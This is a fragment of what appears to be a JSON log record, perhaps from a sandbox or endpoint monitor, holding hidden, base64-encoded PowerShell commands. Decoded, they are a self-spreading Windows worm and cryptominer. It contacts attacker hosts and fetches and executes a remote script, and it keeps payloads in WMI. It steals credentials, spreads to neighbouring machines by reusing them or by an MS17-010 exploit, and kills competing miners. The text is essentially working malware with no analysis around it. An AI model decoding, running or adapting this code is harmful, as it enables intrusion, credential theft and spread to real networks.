GwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQA